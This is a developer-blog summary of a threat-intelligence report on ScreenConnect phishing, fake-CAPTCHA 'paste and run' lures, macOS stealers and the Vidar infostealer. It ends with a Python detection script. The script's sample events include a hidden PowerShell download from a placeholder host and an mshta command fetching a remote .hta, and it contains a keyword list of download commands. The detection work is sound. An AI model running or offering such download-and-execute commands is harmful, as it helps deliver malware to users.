DEV Community

Mark0

Intelligence Insights: March 2026

The February 2026 intelligence report identifies ScreenConnect as the most prevalent threat, frequently delivered via phishing lures ranging from social security documents to party invitations. A significant trend this month is the rise of "paste and run" techniques, utilized by threats such as ClearFake and Scarlet Goldfinch to trick users into executing malicious JavaScript or PowerShell code via fake CAPTCHA and browser update prompts.

macOS-specific threats like Atomic Stealer and MacSync Stealer have reached record high rankings, employing sophisticated numeric obfuscation and native utilities like the 'ditto' command for data staging. Additionally, the Vidar infostealer has seen a resurgence following the takedown of other major C2 infrastructures, often leveraging 'mshta' for network proxying and initial execution chains.
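
The process behaviours named above (paste-and-run execution, 'mshta' fetching remote content, 'ditto' used for staging) can be triaged with simple process-creation heuristics. The following is an added example, not code from the report or this post; the event field names, the sample events, and the command-line patterns (including treating `ditto -c -k` archive creation as a staging signal) are assumptions made for illustration.

```python
import re
import shlex

URL = re.compile(r"https?://", re.I)
# Common download commands seen in pasted one-liners (assumed list, not from the report)
CRADLE = re.compile(r"\b(iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe"}

def base(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()

def classify(ev):
    """Return the names of the heuristics a process-creation event matches."""
    image, parent, cmd = base(ev["image"]), base(ev.get("parent", "")), ev["cmdline"]
    hits = []
    # mshta pointed at a URL: used as a proxy to fetch and run remote content
    if image == "mshta.exe" and URL.search(cmd):
        hits.append("mshta_remote_content")
    # Run dialog / Explorer launching a shell that downloads: paste-and-run shape
    if image in SHELLS and parent == "explorer.exe" and (URL.search(cmd) or CRADLE.search(cmd)):
        hits.append("paste_and_run_candidate")
    # ditto -c -k builds a zip archive; legitimate too, so treat as a triage lead
    if image == "ditto":
        args = shlex.split(cmd)[1:]
        if "-c" in args and "-k" in args:
            hits.append("ditto_zip_staging")
    return hits

# Constructed sample events (hypothetical field names: image, parent, cmdline)
EVENTS = [
    {"image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",
     "cmdline": 'powershell -w hidden -c "iwr https://example.invalid/v"'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": "mshta.exe https://example.invalid/a.hta"},
    {"image": "/usr/bin/ditto", "parent": "/usr/bin/osascript",
     "cmdline": "ditto -c -k --sequesterRsrc /tmp/stage /tmp/out.zip"},
    {"image": "/usr/bin/ditto", "parent": "/bin/zsh",
     "cmdline": "ditto /Applications/App.app /Volumes/Backup/App.app"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": "cmd.exe"},
]

if __name__ == "__main__":
    for ev in EVENTS:
        print(base(ev["image"]), classify(ev))
```

Each rule also matches legitimate administration and backup activity, so the output is a list of leads to correlate with the parent process and user context rather than a verdict.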

